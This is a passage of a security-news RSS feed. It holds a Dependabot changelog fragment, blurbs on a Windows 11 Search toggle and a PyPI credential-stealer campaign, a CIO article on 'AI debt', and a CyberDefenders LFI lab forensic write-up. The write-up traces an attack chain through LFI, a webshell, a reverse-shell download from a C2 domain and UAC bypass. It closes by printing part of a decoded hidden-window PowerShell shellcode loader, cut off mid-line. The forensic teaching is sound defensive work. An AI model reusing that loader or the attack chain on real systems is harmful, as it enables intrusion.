<li>Enable Sorbet/ForbidTUntyped with a todo backlog by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4618866735" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15258" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15258/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15258">#15258</a></li>
<li>v0.381.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4609527458" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15246" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15246/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15246">#15246</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.380.0...v0.381.0"><tt>v0.380.0...v0.381.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 Search Could Get a Bing Results Toggle]]></title>
<description><![CDATA[Microsoft is testing a Windows 11 setting that would let users turn off Bing web results and Microsoft Store suggestions in Search. The feature has not shipped publicly, but it could reduce reliance on Registry workarounds for Windows Home users.
The post Windows 11 Search Could Get a Bing Result...]]></description>
<link>https://tsecurity.de/de/3585348/it-nachrichten/windows-11-search-could-get-a-bing-results-toggle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3585348/it-nachrichten/windows-11-search-could-get-a-bing-results-toggle/</guid>
<pubDate>Tue, 09 Jun 2026 19:32:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft is testing a Windows 11 setting that would let users turn off Bing web results and Microsoft Store suggestions in Search. The feature has not shipped publicly, but it could reduce reliance on Registry workarounds for Windows Home users.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-windows-11-bing-results-toggle/">Windows 11 Search Could Get a Bing Results Toggle</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hades PyPI Attack: 19 Packages Poisoned to Auto-Run Bun Credential Stealer]]></title>
<description><![CDATA[The Miasma supply chain campaign has sparked a fresh attack wave called Hades, this time involving 37 malicious wheel artifacts across 19 packages in the Python Package Index (PyPI) registry, as the Mini Shai-Hulud-style attacks continue to be refined and…
Read more →
The post Hades PyPI Attack: ...]]></description>
<link>https://tsecurity.de/de/3584235/it-security-nachrichten/hades-pypi-attack-19-packages-poisoned-to-auto-run-bun-credential-stealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584235/it-security-nachrichten/hades-pypi-attack-19-packages-poisoned-to-auto-run-bun-credential-stealer/</guid>
<pubDate>Tue, 09 Jun 2026 13:08:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Miasma supply chain campaign has sparked a fresh attack wave called Hades, this time involving 37 malicious wheel artifacts across 19 packages in the Python Package Index (PyPI) registry, as the Mini Shai-Hulud-style attacks continue to be refined and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hades-pypi-attack-19-packages-poisoned-to-auto-run-bun-credential-stealer/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hades-pypi-attack-19-packages-poisoned-to-auto-run-bun-credential-stealer/">Hades PyPI Attack: 19 Packages Poisoned to Auto-Run Bun Credential Stealer</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hades PyPI Attack: 19 Packages Poisoned to Auto-Run Bun Credential Stealer]]></title>
<description><![CDATA[The Miasma supply chain campaign has sparked a fresh attack wave called Hades, this time involving 37 malicious wheel artifacts across 19 packages in the Python Package Index (PyPI) registry, as the Mini Shai-Hulud-style attacks continue to be refined and splintered to target specific ecosystems....]]></description>
<link>https://tsecurity.de/de/3584202/it-security-nachrichten/hades-pypi-attack-19-packages-poisoned-to-auto-run-bun-credential-stealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584202/it-security-nachrichten/hades-pypi-attack-19-packages-poisoned-to-auto-run-bun-credential-stealer/</guid>
<pubDate>Tue, 09 Jun 2026 12:52:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Miasma supply chain campaign has sparked a fresh attack wave called Hades, this time involving 37 malicious wheel artifacts across 19 packages in the Python Package Index (PyPI) registry, as the Mini Shai-Hulud-style attacks continue to be refined and splintered to target specific ecosystems.

"The compromised releases shipped a *-setup.pth file that attempts to execute automatically]]></content:encoded>
</item>
<item>
<title><![CDATA[7 sources of AI debt and how to avoid them]]></title>
<description><![CDATA[CIOs racing to experiment with AI models, test AI agents, and use vibe coding to develop applications may find themselves dealing with a new form of technical debt: AI debt. The pressure to accelerate proofs of concept (POCs) into production will likely drive teams to cut corners and leave known ...]]></description>
<link>https://tsecurity.de/de/3584094/it-security-nachrichten/7-sources-of-ai-debt-and-how-to-avoid-them/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3584094/it-security-nachrichten/7-sources-of-ai-debt-and-how-to-avoid-them/</guid>
<pubDate>Tue, 09 Jun 2026 12:09:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>CIOs racing to experiment with AI models, test AI agents, and use <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">vibe coding</a> to develop applications may find themselves dealing with a new form of technical debt: <a href="https://www.cio.com/article/4066681/ai-could-prove-cios-worst-tech-debt-yet.html">AI debt</a>. The pressure to accelerate proofs of concept (POCs) into production will likely drive teams to cut corners and leave known improvements as “to-dos” for future releases.</p>



<p>But speed isn’t the only factor that will create AI debt. Even with strong <a href="https://www.cio.com/article/3984527/how-to-establish-an-effective-ai-grc-framework.html">AI governance</a> in place, advances in <a href="https://www.cio.com/article/4168909/5-steps-for-frontier-ai-readiness.html">frontier models</a> and <a href="https://drive.starcio.com/2025/10/ai-agents-definitive-guide-saas-security-titans/" rel="nofollow">new AI agents from SaaS platforms</a> means that what gets POC’ed and moved to production today will require unanticipated changes in future releases.</p>



<h2 class="wp-block-heading">Learnings from technical debt</h2>



<p>Creating a framework for understanding, avoiding, and resolving AI debt should build on practices for <a href="https://www.cio.com/article/472768/5-tips-for-tackling-technical-debt.html">reducing technical debt</a>.</p>



<p>First, not all technical debt carries the same risks or priorities for resolution. Understanding the source of technical debt can help rank the likelihood of the issue impacting business operations and its severity. <a href="https://www.cio.com/article/3850777/7-types-of-tech-debt-that-could-cripple-your-business.html">Seven types of technical debt</a> include performance-limiting data management practices, open-source dependencies, architecture limitations, and <a href="https://drive.starcio.com/2022/02/agile-cultures-agile-mindsets/" rel="nofollow">cultural inhibitors</a>. <a href="https://www.cio.com/article/4162306/data-debt-ai-value-killer.html">Data debt</a> includes <a href="https://www.infoworld.com/article/3667314/3-data-quality-metrics-dataops-should-prioritize.html">data quality issues</a>, manual steps in <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">data pipelines</a>, and data management that lacks <a href="https://www.infoworld.com/article/3687135/why-observability-in-dataops.html">observability</a>.</p>



<p>Second, prioritizing the work to address technical debt <a href="https://drive.starcio.com/2022/05/communication-strategy-tech-digital-data/" rel="nofollow">requires CIOs to communicate</a> in terms that both technologists and business leaders comprehend. When there isn’t a shared understanding, business pressure to upgrade or deliver new capabilities may limit the work needed to address security vulnerabilities, fix defects, or improve operational resiliency.</p>



<p>AI debt can also be categorized by its sources. It also requires CIOs to communicate <a href="https://www.infoworld.com/article/4040513/how-to-avoid-the-risks-of-rapidly-deploying-ai-agents.html">the risks of deploying AI capabilities</a> before they are fully tested. But as we are early in the AI era, CIOs should put significant focus on ways to avoid the different types of AI debt as part of defining governance and guardrails.</p>



<p>Here are seven AI debt sources to consider, along with ways to avoid them.</p>



<h2 class="wp-block-heading">AI experiments without targeted outcomes</h2>



<p>The pressure to get more employees learning AI and testing AI agents is needed but comes at a cost. In addition to people’s time and rising token costs, prioritizing work without defining objectives can increase AI debt without leaving a clear understanding of whether the AI capability is delivering value. </p>



<p>“Outcome debt builds when organizations deploy AI without defining the specific, measurable business results they expect it to deliver,” says <a href="https://www.linkedin.com/in/rob-scudiere-8863b21/" rel="nofollow">Rob Scudiere</a>, CTO at Verint. “When teams chase experimentation or hype instead of outcomes, they accumulate systems that are technically impressive but operationally irrelevant. Anchoring every AI initiative to clear, verifiable results prevents this debt and ensures investments translate into stronger, faster, scalable impact.”</p>



<p><strong>Recommendation: </strong><a href="https://drive.starcio.com/2026/02/why-chaotic-ai-experiments-arent-producing-business-value/" rel="nofollow">Avoid chaotic AI experiments</a> by creating an ideation process before committing resources and by tracking active AI initiatives. Require teams to define their targeted outcomes and establish a <a href="https://drive.starcio.com/2025/08/agile-risk-registry-jira-azure-devops/" rel="nofollow">risk registry</a> covering any unknowns, concerns, and future fixes related to their AI implementations.</p>



<h2 class="wp-block-heading">Feeding poor data quality to AI models</h2>



<p>Poor data quality, <a href="https://www.cio.com/article/4016362/6-data-risks-cios-should-be-paranoid-about.html">a data risk CIOs should be paranoid about</a>, gets amplified when used with AI models and agents. One key practice is to define a <a href="https://www.infoworld.com/article/3956251/measuring-success-in-dataops-data-governance-and-data-security.html">data trust score</a> and prevent teams from allowing AI models and agents to use datasets that fall below targeted thresholds.  </p>



<p>“Data quality debt is one of the most dangerous forms of AI debt because errors in training data and inputs cascade through models, pipelines, and downstream decisions,” says <a href="https://www.linkedin.com/in/abhisharmab/" rel="nofollow">Abhi Sharma</a>, co-founder and CEO at Relyance AI. “The best way to prevent it is to establish continuous data lineage and governance so teams can trace inputs, monitor transformations, and correct issues before they propagate into model behavior.”</p>



<p>A second practice is to extend <a href="https://www.infoworld.com/article/3512828/why-data-driven-businesses-need-a-data-catalog.html">data catalogs</a> and <a href="https://www.infoworld.com/article/3497094/does-your-organization-need-a-data-fabric.html">data fabrics</a> by establishing reusable data products. Data products become shareable multi-purpose assets with their own release cycle, treating AI agents and other users as customers.</p>



<p>“Organizations often don’t recognize data quality issues until an AI agent acts on flawed data, amplifying errors at speed and without human judgment,” says <a href="https://www.linkedin.com/in/mayank-mahajan-sfo/" rel="nofollow">Mayank Mahajan</a>, associate director of engineering at Xebia. “Unlike humans, agents cannot question inconsistencies or fill gaps, so they execute on whatever data is available. Package data as governed, well-documented products and implement observability early so issues like schema drift or stale data are caught before they scale.”</p>



<p><strong>Recommendation</strong>: Communicate a set of <a href="https://drive.starcio.com/2024/10/6-important-ai-and-data-governance-non-negotiables/" rel="nofollow">data governance non-negotiables</a> that establish clear minimal criteria for using data in AI, including compliance requirements around data privacy. Strong <a href="https://www.infoworld.com/article/3713005/how-data-governance-must-evolve-to-meet-the-generative-ai-challenge.html">data governance practices</a> help reduce the risk of data-related AI debt.</p>



<h2 class="wp-block-heading">AI model drifts</h2>



<p>One key concern when deploying machine learning models is recognizing when real-time inference data drifts from the model’s training data. Model drift is also an issue when using <a href="https://www.infoworld.com/article/2335814/what-is-retrieval-augmented-generation-more-accurate-and-reliable-llms.html">retrieval-augmented generation (RAG)</a> or providing other contextual data to large language models.</p>



<p>“AI model debt builds when models drift or degrade without teams knowing why, leading to compounding performance and reliability issues,” says <a href="https://www.linkedin.com/in/amitkumarrathi/" rel="nofollow">Amitkumar Rathi</a>, chief product officer at Virtana. “Observability across models, data pipelines, and infrastructure helps identify whether issues stem from data drift, pipeline failures, or resource constraints like GPU contention.”</p>



<p><strong>Recommendation</strong>: The key to avoiding AI model debt is through <a href="https://www.infoworld.com/article/2337145/5-modelops-capabilities-that-boost-data-science-productivity.html">modelops practices</a>, including cataloging models, implementing observability, baselining training data statistics, and monitoring for outcome drift. Rathi recommends, “By continuously linking model outcomes to operating conditions, teams can act early by retraining, fixing data inputs, or rebalancing resources before issues accumulate into long-term model debt.”</p>



<h2 class="wp-block-heading">Overly entitled AI agents</h2>



<p>Should AI agents have the same data access rights as their users? One form of AI debt is when access permissions and the underlying entitlements for AI agents require revisiting and auditing. Worse is when over-permissioned AI agents expose confidential data or make erroneous decisions when accessing sensitive data.</p>



<p>“Enterprises are deploying AI agents that query databases, trigger workflows, and make decisions at machine speed, yet they’re granting these agents broad, static permissions modeled on how humans access data,” says <a href="https://www.linkedin.com/in/ganeshkirti/" rel="nofollow">Ganesh Kirti</a>, CEO at TrustLogix. “Every agent running with over-provisioned access or without context-aware controls is quietly accumulating security, compliance, and data integrity risk that compounds over time.”</p>



<p>Part of the challenge is that more organizations are deploying AI agents in mission-critical business processes. Deploying wide-scoped AI agents with broad data access rights can lead to operational risks and AI debt to address them.</p>



<p>“You insert AI into the process with a specific job defined, not any job, and you make sure that the inputs match the job specification,” says <a href="https://appian.com/about/explore/leadership/team/matt-calkins" rel="nofollow">Matt Calkins</a>, CEO of Appian. “You must give the AI agent a narrow range of possible outputs.”</p>



<p><strong>Recommendation: </strong>To reduce the risk of AI debt from overly empowered AI agents, review the outcomes, decisions, and recommendations AI agents will be responsible for and apply a bottom-up review of the required data entitlements. “To avoid this debt, organizations need to treat AI agents as governed <a href="https://www.csoonline.com/article/2132294/what-are-non-human-identities-and-why-do-they-matter.html">non-human identities</a> with their own entitlement lifecycle, continuous, policy-driven authorization that adapts in real time, and not one-time role grants that nobody revisits,” Kirti recommends.</p>



<h2 class="wp-block-heading">Teaching AI agents broken business processes</h2>



<p><a href="https://www.cio.com/article/227908/what-is-rpa-robotic-process-automation-explained.html">Robotic process automation (RPA)</a> delivered significant ROI when applied to well-defined business processes. With AI agents, some have suggested that role- and task-based agents can perform the required work by providing sufficient context. But this assumes that existing business processes and the data they generate are accurate and reliable.</p>



<p>“Too many organizations are rushing to layer agentic automation on top of their existing processes and infrastructure,” says <a href="https://www.linkedin.com/in/donschuerman/" rel="nofollow">Don Schuerman</a>, CTO and VP of marketing and technology strategy at Pegasystems. “Anyone can now quickly create an app with gen AI, but they struggle when they try to deploy it to do the real work inside real enterprises with all their complexities and dependencies.”</p>



<p><strong>Recommendation: </strong>Avoid the rush to deploy AI agents before conducting upfront audits of existing processes and discussing future needs with business owners. Before generating a single line of code or deploying an AI agent, Schuerman recommends <a href="https://www.cio.com/article/4157466/cios-reimagine-business-processes-to-reap-ai-benefits.html">reimagining how work could be optimally done</a> and how best to engage with customers across channels.</p>



<h2 class="wp-block-heading">AI agent sprawl</h2>



<p>AI agents are available across many platforms, and DevOps teams can use <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">spec-driven</a> development practices to build them. One organization’s chief digital officer recently told me they have already deployed over 1,000 AI agents.</p>



<p>The question is whether CIOs will repeat past mistakes when deploying tools that make it easy for business users to create new assets that are challenging to manage.</p>



<p>Consider the debt created by sprawling behaviors:</p>



<ul class="wp-block-list">
<li>Spreadsheets were great for analytics until business users created too many of them, and there were few tools to manage the underlying data practices and change lifecycles.</li>



<li>Data visualizations were an upgrade, but top CIOs realized that <a href="https://www.cio.com/article/402344/the-secret-to-successful-citizen-data-science-programs-good-governance.html">governance practices were needed to manage citizen data science programs</a>.</li>
</ul>



<p>“Many companies already have more agents than employees, but lack lifecycle management, with no visibility into what agents exist, what data they access, or when they should be retired,” says <a href="https://asana.com/leadership/saket-srivastava" rel="nofollow">Saket Srivastava</a>, CIO at Asana. “Each unmanaged agent compounds risk, including security exposure, duplicated logic, and decisions no one can audit. CIOs should manage agents with the same rigor as employees, with clear ownership, role-based access to the right systems and data, and defined onboarding and retirement, before sprawl becomes a costly, hard-to-contain problem.”</p>



<p><strong>Recommendation</strong>: CIOs of organizations with <a href="https://www.cio.com/article/4006428/saas-sprawl-keeps-growing-with-no-end-in-sight.html">SaaS sprawl</a>, especially those with a history of <a href="https://www.cio.com/article/1247890/7-steps-for-turning-shadow-it-into-a-competitive-edge.html">shadow IT</a>, should define processes and controls for selecting, deploying, and <a href="https://www.linkedin.com/events/7439015641132695552/" rel="nofollow">managing AI agents</a>.</p>



<h2 class="wp-block-heading">Security lagging AI-generated code</h2>



<p>The speed at which AI agents are developed, integrated with <a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">MCP servers</a>, and deployed can compound security vulnerabilities. There are also questions about AI-generated code, with <a href="https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report" rel="nofollow">one study reporting</a> that AI pull requests produce 1.4 times as many critical issues as human-generated ones.</p>



<p><a href="https://www.cio.com/profile/nikhil-mungel/">Nikhil Mungel</a>, head of AI R&amp;D at Cribl, says, “AI-generated code debt can occur when teams use off-the-shelf tools that generate code that isn’t consistent with the company’s standards.”</p>



<p><a href="https://www.linkedin.com/in/vrajeshio/" rel="nofollow">Vrajesh Bhavsar</a>, CEO and co-founder at Operant AI, adds, “As organizations scale AI agents and multi-step AI workflows, they inherit a rapidly expanding attack surface where adversaries are actively exploiting new threat patterns, including zero-click attacks that require no user interaction to trigger data exfiltration, poisoning, or leakage mid-workflow.”</p>



<p><strong>Recommendation</strong>: Organizations that use AI code generators, vibe coding, or spec-driven development methodologies should consider adding AI code review tools such as CodeRabbit, DeepCode, Qodo, SonarQube, or <a href="https://www.augmentcode.com/tools/open-source-ai-code-review-tools-worth-trying" rel="nofollow">open source options</a> to their security programs. Mungel recommends embedding engineering best practices into skill frameworks, such as <a href="https://chrisreddington.com/blog/building-your-agent-toolbox/" rel="nofollow">agents.md or skill.md,</a> to ensure outputs comply with internal guidelines. In addition, Bhavsar recommends deploying adaptive, agentic-aware security controls that can detect and stop threats targeting AI agents in real-time.</p>



<p><a href="https://drive.starcio.com/2026/04/ai-reshaping-business-not-digital-transformation-yet/" rel="nofollow">AI is only reshaping businesses</a> and not transforming them yet. The question for CIOs is whether the pressure to move AI experiments into production and deliver <a href="https://www.cio.com/article/3618293/5-tips-for-better-business-value-from-gen-ai.html">business value</a> will create new forms of AI debt for them to manage in the years to come.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[LFI Escalation Lab Writeup [CyberDefenders]]]></title>
<description><![CDATA[You can read this writeup on my GitBook account LinkScenarioIT staff reported unusual behavior on a workstation running a web application, triggered by an antivirus detection of a suspicious file. Early indicators suggest the website may have served as the entry point.Your task is to investigate ...]]></description>
<link>https://tsecurity.de/de/3583944/hacking/lfi-escalation-lab-writeup-cyberdefenders/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583944/hacking/lfi-escalation-lab-writeup-cyberdefenders/</guid>
<pubDate>Tue, 09 Jun 2026 11:09:02 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/400/1*xSMvA15vFWPk0Mek52EjVg.png"></figure><blockquote>You can read this writeup on my GitBook account <a href="https://prankster.gitbook.io/prankster/cyberdefenders/endpoint-forensics/lfi-escalation"><em>Link</em></a></blockquote><blockquote><strong><em>Scenario</em></strong></blockquote><p>IT staff reported unusual behavior on a workstation running a web application, triggered by an antivirus detection of a suspicious file. Early indicators suggest the website may have served as the entry point.</p><p>Your task is to investigate the full scope of the compromise — tracing how the attacker gained access, what actions they performed, and how they established persistence on the system.</p><h4>Reconnaissance</h4><blockquote><strong><em>Q1: </em></strong><em>The threat actor began by probing the web application for hidden or accessible directories.<br>Which IP address was responsible for this scanning activity?</em></blockquote><p>in the disk image we got xampp access logs, so we need to investigate it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/902/1*socGlQ5dLeq9CezitBpa9Q.png"></figure><p>first, identify the ip address was responsible for this scanning activity, we’ve seen an ip address that made a lot of traffic, and tried to access some hidden directories:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*b6HuFx4wlbkG0NLF6ASwOQ.png"></figure><blockquote><strong><em>218.84.168.131</em></strong></blockquote><blockquote><strong><em>Q2: </em></strong><em>When was the threat actor’s earliest recorded activity on the compromised website?</em></blockquote><p>just extract the time were this ip address first seen in the wild, and don’t forget to set the time to the UTC, because the time is UTC +9:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Dk8XM-h-fHlW1fPmzMgq9A.png"></figure><blockquote><strong><em>2025-09-07 08:56</em></strong></blockquote><blockquote><strong><em>Q3</em></strong><em>: The threat actor rotated his User-Agent multiple times throughout the attack. How many User-Agents did the threat actor use during the first reconnaissance phase of the attack?</em></blockquote><p>since he rotated the user agents, so i was able to see and count the unique user agents he did use:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LkqwhexlCawVoX1xCszuqw.png"></figure><blockquote><strong><em>13</em></strong></blockquote><h4>Initial Access</h4><blockquote><strong><em>Q4: </em></strong><em>A vulnerability was discovered in the old version of the website. How many files were read by the threat actor using the discovered vulnerability?</em></blockquote><p>now we want to know how many files were read by the threat actor using a vulnerability! also the lab called <strong>LFI </strong>so i was ready to see LFI and i did actually. searching with ../ do see all possible file were read by the attacker:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tordOFI98FZYOVkcWG5_kw.png"></figure><pre>1-  system.ini<br>2-  index.php<br>3-  db.php<br>4-  config.php</pre><blockquote><strong><em>4</em></strong></blockquote><h4>Credential Access</h4><blockquote><strong><em>Q5</em></strong><em>: The threat actor was able to access the MySQL database using credentials from one of the files he accessed earlier. What is the password that the threat actor used to access the MySQL database?</em></blockquote><p>if we read the question carefully we can see that he could access the db with credentials from one of the four files he accessed earlier, which is basically <strong>config.php </strong>file. since there isn’t any file in the xampp directory, so ofc it’s in the resident data. time to parse MFT correctly, so let’s go.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2EzYGnj5f9JiqBSYol4H5g.png"></figure><p>after parsing the MFT with <strong>MFTECmd.exe </strong>, getting the entry number of the file, multiplying 77932 by 1024 (NTFS MFT record size = 1024 bytes), then go to the hex address with HxD (ctrl+g)</p><p><strong>77932 x 1024 = 79,802,368 --&gt; (4C1B000)16</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/868/1*LxDm5G0noU3DTX4NAIsF8w.png"></figure><p>reversing the data from hex for better reading.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*A469KwqgidmC_cX7SIaOQg.png"></figure><p>or using MFT Explorer and go to the direct file path <strong><em>C:\xampp\htdocs\config.php</em></strong> and read the file data directly:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XBxIXqoztPQNOiFqOrAGrA.png"></figure><blockquote><strong><em>IdonknowMayBe2222</em></strong></blockquote><blockquote><strong><em>Q6</em></strong><em>: When did the threat actor first successfully authenticate to the MySQL database?</em></blockquote><p>filtering for the <strong>post</strong>requests happened, so we got the best sequence<br><strong>post</strong> request to the<strong>index.php</strong>, then responded with redirection "<strong>302</strong>" , and accessed the website successfully with all files loaded "<strong>200</strong>"</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*6gVW17EwBd4vshzgXOUY1g.png"></figure><blockquote><strong><em>2025-09-07 12:39</em></strong></blockquote><h4>Exfiltration</h4><blockquote><strong><em>Q7</em></strong><em>: After authenticating to the MySQL database, the threat actor targeted a specific database for exfiltration. Which database did he access?</em></blockquote><p>filtered with "<strong>db</strong>"<strong> </strong>or "<strong>db=</strong>" to get the database clearly:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0V6XzzVUmhwoglFuMpkHYw.png"></figure><p>or from the <strong>config.php </strong>file that we got before from the MFT:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YcTac5aG6G1rJSUiqv3SzQ.png"></figure><blockquote><strong><em>vtubermusic</em></strong></blockquote><blockquote><strong><em>Q8</em></strong><em>: Which table did the threat actor export from the database?</em></blockquote><p>we can do double search here, searching for <strong>db=tubermusic </strong>, then search in the search output for <strong>table=</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mKKIROd8vKExb9id1VS3JQ.png"></figure><blockquote><strong><em>users</em></strong></blockquote><h4>Execution</h4><blockquote><strong><em>Q9</em></strong><em>: On the next day, the threat actor logged into the MySQL database again using a different IP address. What is this IP address?</em></blockquote><p>the recent ip address logged in directly next day:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/886/1*S-GD1UAh_IbOxhju-GKirw.png"></figure><blockquote><strong><em>182.44.8.254</em></strong></blockquote><blockquote><strong><em>Q10</em></strong><em>: The threat actor used SQL commands to create a webshell.<br>What is the full path of this webshell file on the system?</em></blockquote><p>we can search for<strong>cmd= </strong>or just scroll a little to find this</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/953/1*hmevUMnUXMlwO9TLqY-1ZA.png"><figcaption><strong>config_old.php</strong></figcaption></figure><p>now we need to get the full path, we can predict it, but let’s get it correctly:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*q313CfoPpS2fSfR6CzNzMw.png"></figure><blockquote><strong>C:\xampp\htdocs\config_old.php</strong></blockquote><blockquote><strong><em>Q11</em></strong><em>: The threat actor used a Living-off-the-Land Binary (LOLBin) to hide the webshell. What MITRE ATT&amp;CK technique corresponds to this activity?</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/540/1*UbeQEV6sHRbNYcP4U4iquQ.png"></figure><blockquote><strong><em>T1564.001</em></strong></blockquote><blockquote><strong><em>Q12</em></strong><em>: The threat actor executed a command to download a reverse shell payload from a C2 server. What is the domain used to host this payload?</em></blockquote><p>from the <strong>access.log </strong>file, we can view that powershell command ran</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9RsALChQhI7Wtt5cQbbi_A.png"></figure><p>so let’s decode the url correctly</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XbVeujIDgpF2gxFcALm3mA.png"></figure><p>then decode the base64 encoded command</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IsTeNBc28SbBB6GX_ZFkuQ.png"></figure><blockquote><strong><em>wscryss.xyz</em></strong></blockquote><blockquote><strong><em>Q13</em></strong><em>: The reverse shell payload was downloaded to a specific location and executed. What is the full path of this payload?</em></blockquote><p>from the last decoded command we got in the last image above, we can get the answer directly since we know the username of the victim from the disk image "<strong>hoshisora</strong>" and the path found in the command can be from <strong>$env:TEMP\music.exe</strong> to <strong>C:\users\hoshisora\appdata\local\temp\music.exe </strong>.<br>we need to mention also that <strong>music.exe</strong> not found in the MFT, so if we need more clear evidence, we can view it clearly from the prefetch files :</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*HbqGkBdLfnCPZlIY_y5X9w.png"></figure><p>or from the Amcache hive:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BPQotTv5vAb2Ys3jjdfqjA.png"></figure><blockquote><strong>C:\users\hoshisora\appdata\local\temp\music.exe</strong></blockquote><h4>Privilege Escalation</h4><blockquote><strong><em>Q14</em></strong><em>: After establishing the C2 connection, the threat actor attempted several methods to bypass User Account Control (UAC).<br>One method used a PowerShell script. What is the name of this script?</em></blockquote><p>investigating the powershell logs, searching for scripts extensions <strong>.ps1 :</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/899/1*ZGJueMcqeIA8aCINVsJgVg.png"></figure><blockquote><strong><em>LykIsnWn.ps1</em></strong></blockquote><blockquote><strong><em>Q15</em></strong><em>: The PowerShell script executed shellcode as part of its payload. What is the name of the variable that stores the raw shellcode in the script?</em></blockquote><p>since it’s a powershell script, we can investigate the powershell operational log file as it records the actual powershell code that executed, including decoded and de-obfuscated script blocks with Event ID 4104, so with a quick filter on event id 4104, and <strong>LykIsnWn.ps1 </strong>we got one single event:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*MhPypmebmrdoVpGFt5p7XA.png"></figure><p>now, we’ve got a huge base64 encoded command, let’s decode it:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IuRYoOTnTl5TL_CVoOetQg.png"></figure><pre>if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+<br>'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};<br>$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;<br>$s.Arguments='-noni -nop -w hidden -c &amp;([scriptblock]::<br>create((New-Object System.IO.StreamReader<br>(New-Object System.IO.Compression.GzipStream<br>((New-Object System.IO.MemoryStream 